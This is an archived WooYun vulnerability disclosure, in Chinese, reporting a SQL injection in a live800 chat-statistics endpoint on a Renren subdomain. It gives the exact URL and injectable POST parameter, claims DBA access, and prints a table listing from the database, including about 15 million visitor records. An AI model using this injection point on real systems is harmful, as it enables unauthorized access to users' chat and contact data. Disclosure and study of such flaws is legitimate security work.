人人网某处SQL注入影响大量数据

编号222273
Urlhttp://www.wooyun.org/bug.php?action=view&id=222273
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题人人网某处SQL注入影响大量数据
漏洞类型SQL注射漏洞
厂商人人网
白帽子路人甲
提交日期2016-06-23 12:21:00
公开日期2016-06-24 12:19:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签Mysql
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
RT
漏洞细节

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)
export=txt&companyId=1&subStrSql=*


398.png


dba权限

399.png


Database: live800_im
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| visitor_access | 15081675 |
| operator_status | 633129 |
| chat_topic | 616252 |
| live800_system | 410676 |
| chat_content | 289363 |
| chat_sta | 289308 |
| chat_info | 285963 |
| leaveword_topic | 161506 |
| trustful_visitor | 78942 |
| leaveword | 74624 |
| contact | 71702 |
| cookie_contact | 71702 |
| company_config_data | 69254 |
| lost | 51034 |
| sync_info | 23170 |
| op_chat_content | 7200 |
| daily_flow_capacity | 1329 |
| sys_operate_log | 1266 |
| faq | 115 |
| operator | 82 |
| privilege | 82 |
| company_config | 36 |
| user_defined_button | 18 |
| company_ui_config | 16 |
| config_template | 12 |
| user_invite | 12 |
| company_skill | 11 |
| ad_column | 10 |
| routing_action | 6 |
| chat_config | 4 |
| leaveword_box | 3 |
| notify | 3 |
| routing_condition | 3 |
| routing_policy | 3 |
| routing_rule | 3 |
| canned_url | 1 |
| company | 1 |
| company_style | 1 |
| customization | 1 |
| fuf | 1 |
| ip_prohibit | 1 |
| operator_account | 1 |
+---------------------+---------+

POC

398.png

修复方案

改改改

状态信息 2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复忽略
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-24 12:19
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

......跟我的重复了

_Thorns02016-06-23 16:26:00

又有新裤子出来了。。

大师兄02016-06-23 13:45:00